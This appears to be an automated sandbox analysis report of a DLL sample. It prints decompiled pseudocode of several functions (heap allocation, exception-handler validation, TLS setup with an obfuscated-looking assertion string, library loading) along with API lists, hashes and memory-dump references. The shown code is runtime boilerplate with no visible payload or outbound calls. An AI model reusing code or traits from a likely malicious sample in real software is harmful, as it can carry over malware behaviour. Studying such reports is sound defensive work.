                          • Opcode Fuzzy Hash: cdbca23a8194403761f5ab5f9484a72302f8e76e15f22c2bca05474f59dd7df7
                          • Instruction Fuzzy Hash: ED3122B5D002058FDB44DFF8E804FAEBBB5EFD9B24F10412AD914AB384D375A8058BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E4A10A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B00;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6e4fadc8; // 0xb00000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6e4eb227]");
						asm("movsd xmm1, [0x6e4eb220]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6e4fadc8; // 0xb00000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6e4eb237]");
								asm("movsd xmm1, [0x6e4eb22f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6E4C6C40(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6E4C6BC0( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6E4BAE10(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6E4B9770(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6e4fadc8, 0, _v36);
								}
								HeapFree( *0x6e4fadc8, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6e4fadc8 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6E4C6C30(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6E4A1000(_v52, _v48);
						return E6E4A1000(_v40, 0xf);
					} else {
						 *0x6e4fadc8 = _t45;
						goto L3;
					}
				}
				L21:
			}


























                          0x6e4a10a0
                          0x6e4a10a0
                          0x6e4a10a0
                          0x6e4a10a3
                          0x6e4a10a4
                          0x6e4a10a5
                          0x6e4a10a6
                          0x6e4a10a9
                          0x6e4a10ac
                          0x6e4a10b3
                          0x6e4a10c4
                          0x6e4a10c7
                          0x6e4a10cd
                          0x6e4a10d4
                          0x6e4a10e8
                          0x6e4a10ed
                          0x6e4a10f4
                          0x00000000
                          0x6e4a10fa
                          0x6e4a10fa
                          0x6e4a1102
                          0x6e4a110a
                          0x6e4a110d
                          0x6e4a1112
                          0x6e4a1116
                          0x6e4a111d
                          0x6e4a1131
                          0x6e4a1136
                          0x6e4a113d
                          0x00000000
                          0x6e4a1143
                          0x6e4a1143
                          0x6e4a114b
                          0x6e4a1153
                          0x6e4a1155
                          0x6e4a115a
                          0x6e4a115d
                          0x6e4a1164
                          0x6e4a1169
                          0x6e4a1192
                          0x6e4a1195
                          0x6e4a1198
                          0x00000000
                          0x00000000
                          0x6e4a119a
                          0x6e4a119a
                          0x6e4a11a0
                          0x6e4a11a2
                          0x6e4a1235
                          0x6e4a123c
                          0x6e4a1241
                          0x00000000
                          0x6e4a11a8
                          0x6e4a11ab
                          0x6e4a11ad
                          0x6e4a11b5
                          0x6e4a11b8
                          0x6e4a11bb
                          0x6e4a11c2
                          0x6e4a11c5
                          0x6e4a11ca
                          0x6e4a11cd
                          0x6e4a11d0
                          0x6e4a11d3
                          0x6e4a11d6
                          0x6e4a11d6
                          0x6e4a1171
                          0x6e4a1175
                          0x6e4a117e
                          0x6e4a1180
                          0x6e4a1185
                          0x6e4a1188
                          0x6e4a118a
                          0x6e4a118d
                          0x6e4a1191
                          0x00000000
                          0x6e4a1191
                          0x00000000
                          0x6e4a11a2
                          0x6e4a11db
                          0x6e4a11e5
                          0x6e4a11f2
                          0x6e4a11fa
                          0x6e4a11fe
                          0x6e4a120b
                          0x6e4a120b
                          0x6e4a121b
                          0x6e4a1220
                          0x6e4a1223
                          0x6e4a1230
                          0x6e4a1230
                          0x6e4a111f
                          0x6e4a111f
                          0x6e4a1126
                          0x6e4a124a
                          0x6e4a124a
                          0x00000000
                          0x6e4a112c
                          0x6e4a112c
                          0x00000000
                          0x6e4a112c
                          0x6e4a1126
                          0x6e4a111d
                          0x6e4a10d6
                          0x6e4a10d6
                          0x6e4a10dd
                          0x6e4a1243
                          0x6e4a1243
                          0x6e4a124f
                          0x6e4a1254
                          0x6e4a1259
                          0x6e4a1264
                          0x6e4a126d
                          0x6e4a1283
                          0x6e4a10e3
                          0x6e4a10e3
                          0x00000000
                          0x6e4a10e3
                          0x6e4a10dd
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6E4A10D6
                          • HeapAlloc.KERNEL32(00B00000,00000000,0000000F), ref: 6E4A10ED
                          • GetProcessHeap.KERNEL32(00B00000,00000000,0000000F), ref: 6E4A111F
                          • HeapAlloc.KERNEL32(00B00000,00000000,00000010,00B00000,00000000,0000000F), ref: 6E4A1136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,00B00000,00000000,0000000F), ref: 6E4A120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,00B00000,00000000,0000000F), ref: 6E4A121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 070e31e65841ec72475025e8cd25483a9f9dafe6699cfaef276c4bcc595a0058
                          • Instruction ID: ef0c32cf5c86ed64a43711c44529d72386d11b400f5d52a976f7a71a27388c08
                          • Opcode Fuzzy Hash: 070e31e65841ec72475025e8cd25483a9f9dafe6699cfaef276c4bcc595a0058
                          • Instruction Fuzzy Hash: 02519FB5D006099BDB00DFF8D840FEEB7B6FF99754F10852AE905AB345D771A8048BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BC860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4BC860(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E6E4C6B40(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x6e4fa4a4;
				E6E4BC820(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x6e4fa4a4);
				E6E4BDB5C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E6E4BDCE0(_t80, 0xfffffffe, _t103, 0x6e4fa4a4);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E6E4BDC80(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E6E4BC820(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x6e4f2504;
											if(__eflags != 0) {
												_t75 = E6E4C69A0(__eflags, 0x6e4f2504);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x6e4f2504; // 0x6e4bca71
													 *0x6e4c8154(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E6E4BDCC0(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E6E4BDCE0(_t68, _t100, _t103, 0x6e4fa4a4);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E6E4BC820(_t80, _t95, _t100, _t103, _v12);
										E6E4BDCA0();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}




































                          0x6e4bc860
                          0x6e4bc867
                          0x6e4bc86b
                          0x6e4bc86c
                          0x6e4bc872
                          0x6e4bc87e
                          0x6e4bc880
                          0x6e4bc886
                          0x6e4bc886
                          0x6e4bc88f
                          0x6e4bc891
                          0x6e4bc894
                          0x6e4bc897
                          0x6e4bc89f
                          0x6e4bc8a4
                          0x6e4bc8a7
                          0x6e4bc8aa
                          0x6e4bc8b1
                          0x6e4bc90d
                          0x6e4bc910
                          0x6e4bc918
                          0x6e4bc91f
                          0x00000000
                          0x6e4bc91f
                          0x00000000
                          0x6e4bc8b3
                          0x6e4bc8b3
                          0x6e4bc8b9
                          0x6e4bc8bf
                          0x6e4bc8c5
                          0x6e4bc930
                          0x6e4bc939
                          0x6e4bc8c7
                          0x6e4bc8c7
                          0x6e4bc8c7
                          0x6e4bc8cd
                          0x6e4bc8d0
                          0x6e4bc8d3
                          0x6e4bc8d6
                          0x6e4bc8d9
                          0x6e4bc8de
                          0x6e4bc8f4
                          0x00000000
                          0x6e4bc8e0
                          0x6e4bc8e0
                          0x6e4bc8e2
                          0x6e4bc8e7
                          0x6e4bc8e9
                          0x6e4bc8ec
                          0x6e4bc8ee
                          0x6e4bc904
                          0x6e4bc924
                          0x6e4bc924
                          0x6e4bc928
                          0x00000000
                          0x6e4bc8f0
                          0x6e4bc8f0
                          0x6e4bc93a
                          0x6e4bc93d
                          0x6e4bc943
                          0x6e4bc945
                          0x6e4bc94c
                          0x6e4bc953
                          0x6e4bc958
                          0x6e4bc95b
                          0x6e4bc95d
                          0x6e4bc95f
                          0x6e4bc96c
                          0x6e4bc972
                          0x6e4bc974
                          0x6e4bc977
                          0x6e4bc977
                          0x6e4bc97a
                          0x6e4bc97a
                          0x6e4bc94c
                          0x6e4bc980
                          0x6e4bc982
                          0x6e4bc987
                          0x6e4bc98a
                          0x6e4bc98d
                          0x6e4bc995
                          0x6e4bc999
                          0x6e4bc99e
                          0x6e4bc99e
                          0x6e4bc9a1
                          0x6e4bc9a5
                          0x6e4bc9a8
                          0x6e4bc9b8
                          0x6e4bc9bd
                          0x6e4bc9c1
                          0x6e4bc9c4
                          0x6e4bc9c7
                          0x6e4bc9c9
                          0x6e4bc9cf
                          0x6e4bc9d2
                          0x6e4bc9d2
                          0x6e4bc9d5
                          0x6e4bc9d5
                          0x6e4bc9d7
                          0x6e4bc9d9
                          0x00000000
                          0x00000000
                          0x6e4bc9db
                          0x6e4bc9dd
                          0x00000000
                          0x6e4bc9df
                          0x6e4bc9df
                          0x6e4bc9e2
                          0x6e4bc9e5
                          0x00000000
                          0x6e4bc9e7
                          0x6e4bc9e7
                          0x6e4bc9ea
                          0x6e4bc9ed
                          0x6e4bc9ef
                          0x00000000
                          0x6e4bc9f1
                          0x00000000
                          0x6e4bc9f1
                          0x6e4bc9ef
                          0x6e4bc9e5
                          0x00000000
                          0x6e4bc9dd
                          0x6e4bc9f3
                          0x6e4bc9f5
                          0x6e4bc9f5
                          0x6e4bc9f9
                          0x6e4bc9cb
                          0x6e4bc9cb
                          0x6e4bc9cb
                          0x6e4bc9ce
                          0x6e4bc9ce
                          0x6e4bc8f2
                          0x00000000
                          0x6e4bc8f2
                          0x6e4bc8f0
                          0x6e4bc8ee
                          0x00000000
                          0x6e4bc8f7
                          0x6e4bc8f7
                          0x6e4bc8f9
                          0x6e4bc900
                          0x00000000
                          0x6e4bc902
                          0x00000000
                          0x6e4bc900
                          0x6e4bc8c5
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E4BC89F
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E4BC953
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: e3c004907eeb2d78482493feb4a461d697e8e003f4e4a72a71e7d1294e34a3a7
                          • Instruction ID: ee3acf6209284e8c167116e87ab319f7f2113088b2a87017deb5f656e5a6edb3
                          • Opcode Fuzzy Hash: e3c004907eeb2d78482493feb4a461d697e8e003f4e4a72a71e7d1294e34a3a7
                          • Instruction Fuzzy Hash: 6F417134E002099FDF00DFB9C894E9EBBB9AF45328F1085AAE8145F351D7719915CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B2B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E6E4B2B10(void* __ebx, long* __ecx, void* __edi, void* __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				long _v76;
				intOrPtr _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				intOrPtr _v104;
				char _v108;
				void* __ebp;
				long _t41;
				void* _t47;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void _t56;
				void* _t65;
				long _t70;
				long* _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t87;

				_t78 = _t77 - 0x5c;
				_v32 = _t78;
				_v20 = 0xffffffff;
				_v24 = E6E4B3C10;
				_t73 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				__imp__AcquireSRWLockExclusive(0x6e4fadb4, __esi, __edi, __ebx);
				_v36 = 0x6e4fadb4;
				_t70 =  *__ecx;
				if(_t70 != 0) {
					L10:
					__imp__ReleaseSRWLockExclusive(_v36);
					 *[fs:0x0] = _v28;
					return _t70;
				} else {
					_t7 =  &(_t73[1]); // 0x6e4b3100
					_t56 =  *_t7;
					_t41 = TlsAlloc();
					if(_t41 == 0xffffffff) {
						_v20 = 0;
						E6E4C6E20(_t56, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi", 0x2e, _t70, _t73, __eflags, 0x6e4ede0c);
						_t78 = _t78 + 4;
						asm("ud2");
						goto L12;
					} else {
						_t70 = _t41;
						if(_t56 == 0) {
							L9:
							 *_t73 = _t70;
							if(_t70 == 0) {
								L12:
								_v108 = 0x6e4ed74c;
								_v104 = 1;
								_v100 = 0;
								_v92 = 0x6e4ecd60;
								_v84 = 0x6e4ed5a4;
								_v80 = 2;
								_v40 = 0;
								_v44 = 0;
								_v88 = 0;
								_v76 = 0;
								_v20 = 0;
								_v60 =  &_v108;
								_v56 = E6E4A22E0;
								_v68 =  &_v60;
								_v64 = 1;
								_v52 = E6E4AD2A0( &_v44, __eflags);
								_v48 =  &_v84;
								E6E4AD460( &_v52);
								asm("int 0x29");
								asm("ud2");
								goto L13;
							} else {
								goto L10;
							}
						} else {
							_t51 =  *0x6e4fadc8; // 0xb00000
							if(_t51 != 0) {
								L6:
								_t52 = HeapAlloc(_t51, 0, 0xc);
								_t87 = _t52;
								if(_t87 == 0) {
									goto L13;
								} else {
									 *_t52 = _t56;
									 *(_t52 + 4) = _t70;
									 *(_t52 + 8) = 0;
									_t65 = _t52;
									_t53 =  *0x6e4fadcc; // 0x0
									do {
										 *((intOrPtr*)(_t65 + 8)) = _t53;
										asm("lock cmpxchg [0x6e4fadcc], ecx");
									} while (_t87 != 0);
									goto L9;
								}
							} else {
								_t51 = GetProcessHeap();
								if(_t51 == 0) {
									L13:
									_t47 = E6E4C6C30(_t56, 0xc, 4, _t70, _t73, __eflags);
									asm("ud2");
									__eflags =  &_a8;
									return E6E4AC870(_t47,  &_v36);
								} else {
									 *0x6e4fadc8 = _t51;
									goto L6;
								}
							}
						}
					}
				}
			}





































                          0x6e4b2b16
                          0x6e4b2b19
                          0x6e4b2b1c
                          0x6e4b2b23
                          0x6e4b2b2a
                          0x6e4b2b36
                          0x6e4b2b39
                          0x6e4b2b44
                          0x6e4b2b4a
                          0x6e4b2b51
                          0x6e4b2b55
                          0x6e4b2bc5
                          0x6e4b2bc8
                          0x6e4b2bd1
                          0x6e4b2be0
                          0x6e4b2b57
                          0x6e4b2b57
                          0x6e4b2b57
                          0x6e4b2b5a
                          0x6e4b2b63
                          0x6e4b2be1
                          0x6e4b2bf7
                          0x6e4b2bfc
                          0x6e4b2bff
                          0x00000000
                          0x6e4b2b65
                          0x6e4b2b65
                          0x6e4b2b69
                          0x6e4b2bbd
                          0x6e4b2bc1
                          0x6e4b2bc3
                          0x6e4b2c01
                          0x6e4b2c0a
                          0x6e4b2c11
                          0x6e4b2c18
                          0x6e4b2c1f
                          0x6e4b2c26
                          0x6e4b2c2d
                          0x6e4b2c34
                          0x6e4b2c38
                          0x6e4b2c3f
                          0x6e4b2c46
                          0x6e4b2c4d
                          0x6e4b2c54
                          0x6e4b2c5a
                          0x6e4b2c61
                          0x6e4b2c64
                          0x6e4b2c73
                          0x6e4b2c76
                          0x6e4b2c79
                          0x6e4b2c83
                          0x6e4b2c85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b2b6b
                          0x6e4b2b6b
                          0x6e4b2b72
                          0x6e4b2b86
                          0x6e4b2b8b
                          0x6e4b2b90
                          0x6e4b2b92
                          0x00000000
                          0x6e4b2b98
                          0x6e4b2b98
                          0x6e4b2b9a
                          0x6e4b2b9d
                          0x6e4b2ba4
                          0x6e4b2ba6
                          0x6e4b2bb0
                          0x6e4b2bb0
                          0x6e4b2bb3
                          0x6e4b2bb3
                          0x00000000
                          0x6e4b2bb0
                          0x6e4b2b74
                          0x6e4b2b74
                          0x6e4b2b7b
                          0x6e4b2c87
                          0x6e4b2c91
                          0x6e4b2c96
                          0x6e4b2ca4
                          0x6e4b2cb3
                          0x6e4b2b81
                          0x6e4b2b81
                          0x00000000
                          0x6e4b2b81
                          0x6e4b2b7b
                          0x6e4b2b72
                          0x6e4b2b69
                          0x6e4b2b63

                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6E4FADB4), ref: 6E4B2B44
                          • TlsAlloc.KERNEL32 ref: 6E4B2B5A
                          • GetProcessHeap.KERNEL32 ref: 6E4B2B74
                          • HeapAlloc.KERNEL32(00B00000,00000000,0000000C), ref: 6E4B2B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADB4), ref: 6E4B2BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6E4B2BE8
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 846f4cac512fdd2b10262c9faedff488c58c44ebb24a4fbfaf2cfb2a2481f286
                          • Instruction ID: 1b57236c5b7320c1feea3ba8cb84591e673a0f8c312a974d30bcdc961e7500fe
                          • Opcode Fuzzy Hash: 846f4cac512fdd2b10262c9faedff488c58c44ebb24a4fbfaf2cfb2a2481f286
                          • Instruction Fuzzy Hash: A34135B59002098FDB00DFF4D858BAEBBB5FF88718F10452AD519AB380DB759949CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C1BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4C1BFC(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6e4fb500 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6e4f34b0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6e4fb500 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6e4fb500 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6E4BF838(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6E4BF838(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                          0x6e4c1c05
                          0x6e4c1c9a
                          0x6e4c1c0d
                          0x6e4c1c0f
                          0x6e4c1c19
                          0x6e4c1c1e
                          0x6e4c1c2b
                          0x6e4c1c40
                          0x6e4c1c44
                          0x6e4c1caa
                          0x6e4c1caf
                          0x6e4c1cb6
                          0x6e4c1cba
                          0x6e4c1cbd
                          0x6e4c1cbd
                          0x6e4c1cc3
                          0x6e4c1cc3
                          0x6e4c1ca5
                          0x6e4c1ca9
                          0x6e4c1ca9
                          0x6e4c1c46
                          0x6e4c1c4f
                          0x6e4c1c88
                          0x6e4c1c95
                          0x6e4c1c97
                          0x6e4c1c97
                          0x00000000
                          0x6e4c1c97
                          0x6e4c1c59
                          0x6e4c1c5e
                          0x6e4c1c63
                          0x00000000
                          0x00000000
                          0x6e4c1c6d
                          0x6e4c1c72
                          0x6e4c1c77
                          0x00000000
                          0x00000000
                          0x6e4c1c7c
                          0x6e4c1c82
                          0x6e4c1c86
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c1c86
                          0x6e4c1c23
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c1c29
                          0x6e4c1ca3
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6E4C1D09,FFFDD001,00000400,?,00000000,?,?,6E4C1E82,00000021,FlsSetValue,6E4F39F8,6E4F3A00,?), ref: 6E4C1CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
